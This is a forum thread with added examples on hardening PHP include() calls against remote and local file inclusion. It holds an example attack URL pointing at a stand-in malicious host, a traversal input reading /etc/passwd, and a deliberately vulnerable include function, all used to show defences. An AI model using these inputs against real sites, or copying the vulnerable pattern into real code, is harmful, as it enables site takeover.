Hi all,

I really don't know much at all about using PHP. However, I made a site for a client, probably about 6 pages. I created it at first using .html pages. I then renamed those to .php, and I created includes for the top and bottom menu, leaving them as .html pages.

So the include code I used looks like this:
<?php include("includes/mainnav.html"); ?>
the 2nd include for the bottom menu looks similar

I also host my client's site, and recently found out that someone had set up a phishing site in some of the folders. The helpdesk is telling me:

If the include() statements do not check for sanitized input or only use local includes, they can be exploited very easily. These include() statements are the main target for remote file inclusion attacks that allow people to deface/hack domains.

If this is true, how then would I make this code safer? I assumed I was using something that was so basic that I never would have dreamed this would happen.

I suppose my second question might be, would you agree with what was said in this case as I described my pages, or do you think I need to look elsewhere for a possible cause?

Extremely grateful for any help with this!

    There are several ways to make includes more safe.

    If you can use .htaccess,
    then make such a file, with this content:

    Deny from all

    and put it inside /includes/ folder.

    Another method can be used in .php pages.
    In index.php and the other pages in your root folder,
    put this at the beginning:

    <?php
    define('MYCAR', true);
    include("includes/mainnav.php");
    
    //the rest

    and then in mainnav.php you put:

    <?php
    if(!defined('MYCAR')) exit('hacker!!!'); // stop the page
    ?>
    <html>
    <head>
    etc
    etc

    This method requires that you rename your .html pages into .php
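    An added example, not part of the reply above: the same "deny direct requests to /includes/" rule written so that it works on both Apache 2.2 and 2.4. Apache 2.4 moved host-based access control to mod_authz_core's Require directive; a bare Deny from all on 2.4 produces a 500 error unless the compatibility module mod_access_compat is loaded, so the two syntaxes are wrapped in IfModule checks. Two things to verify on the host are assumptions here: the server must honour .htaccess in that directory (AllowOverride must permit Limit or AuthConfig), and note that this only blocks HTTP requests for the files; PHP's include() reads them from disk and is unaffected, which is what you want.

```apache
# includes/.htaccess  (added example; works on Apache 2.2 and 2.4)

# Apache 2.4+: mod_authz_core is always loaded, so this branch is taken.
<IfModule mod_authz_core.c>
    Require all denied
</IfModule>

# Apache 2.2: mod_authz_core does not exist, so fall back to the old syntax.
<IfModule !mod_authz_core.c>
    Order deny,allow
    Deny from all
</IfModule>
```

    Either branch makes a direct request for includes/mainnav.html (or .php) return 403, which is the same effect the MYCAR constant check gives for .php includes, but it also covers plain .html includes without renaming them.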

      Thank you for your help!

      Pardon my ignorance, but what does 'MYCAR' refer to? :o

        I don't know ...
        You can use whatever.

        define('MYCAT', true);
        define('HUBERTHUMPHREY', true);

        It is like saying
        $name = true;
        $email = true;
        ... or whatever
        $handylandybopper = 3;
        echo $handylandybopper;

          The specific issue you quoted has more to do with including based on an external input, such as a value in the URL query string:

          include $_GET['name'];
          

          If the user submits the HTTP request for that page as something like http://example.com/index.php?name=http://bad.example.com/malicious.php, then you might get results you don't want. This probably does not apply in your stated case, as you are including a specific string literal for the file to be included, not a variable from an external input.

          If it does become a situation you need to deal with, I generally would do something like:

          $name = basename($_GET['name']);
          include 'path/to/includes/' . $name . '.php';
          

          (With some other error-handling to deal with non-existing file names)
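          An added example, not code from the reply above: it places the include $_GET['name'] pattern quoted above beside a loader that never lets the request name a file at all. The request supplies only a key into a fixed table (PAGES); the resolved path is then checked with realpath() to confirm it is still a regular file inside the include directory. The function names (vulnerable_include, resolve_include, safe_include), the PAGES table, the temporary include directory and the attacker-style inputs at the bottom are all assumptions constructed for this demo; run it from the command line with php.

```php
<?php
// Added example, not code from the thread. Names below are assumptions.

// Vulnerable pattern: whatever arrives in ?name= goes straight to include().
// With allow_url_include=On this is remote file inclusion; with it Off (the
// default since PHP 5.2) it is still local file inclusion via ../ paths.
function vulnerable_include(string $name): void
{
    include $name;
}

// Hardened: the request only chooses a key; the filename comes from our table.
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

// Returns the absolute path to include, or null if the request is rejected.
function resolve_include(string $includeDir, string $name): ?string
{
    if (!isset(PAGES[$name])) {
        return null;                          // not in the allowlist
    }
    $base = realpath($includeDir);
    $path = realpath($includeDir . '/' . PAGES[$name]);
    // realpath() resolves symlinks and "..", so a prefix check against the
    // resolved base directory is meaningful. Also require a regular file.
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0
        || !is_file($path)) {
        return null;
    }
    return $path;
}

// Wrapper a page would call: 404 on anything the resolver rejects.
function safe_include(string $includeDir, string $name): bool
{
    $path = resolve_include($includeDir, $name);
    if ($path === null) {
        http_response_code(404);
        return false;
    }
    include $path;
    return true;
}

// --- self-contained demo with a constructed include directory ---
$dir = sys_get_temp_dir() . '/inc_demo_' . getmypid();
mkdir($dir);
file_put_contents($dir . '/home.php',   "<?php echo \"home page\\n\";");
file_put_contents($dir . '/about.php',  "<?php echo \"about page\\n\";");
// A file that exists on disk but is deliberately absent from PAGES.
file_put_contents($dir . '/secret.php', "<?php echo \"should never be reachable\\n\";");

// Constructed inputs: an allowlisted key, directory traversal, a remote URL
// (the RFI case from the reply above) and an unlisted local file.
$inputs = [
    'about',
    '../../etc/passwd',
    'http://bad.example.com/malicious.php',
    'secret',
];
foreach ($inputs as $input) {
    $path = resolve_include($dir, $input);
    printf("%-40s => %s\n", $input,
        $path === null ? 'rejected' : 'include ' . basename($path));
}

// Only an allowlisted key reaches include(); this prints the page body.
safe_include($dir, 'home');

// cleanup
array_map('unlink', glob($dir . '/*.php'));
rmdir($dir);
```

          The basename() plus fixed ".php" suffix shown in the reply above limits inclusion to .php files in one directory, which already defeats the remote URL and the ../ cases; the allowlist goes one step further by also refusing files that merely happen to sit in that directory, so an uploaded or leftover script there cannot be reached through the page parameter.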
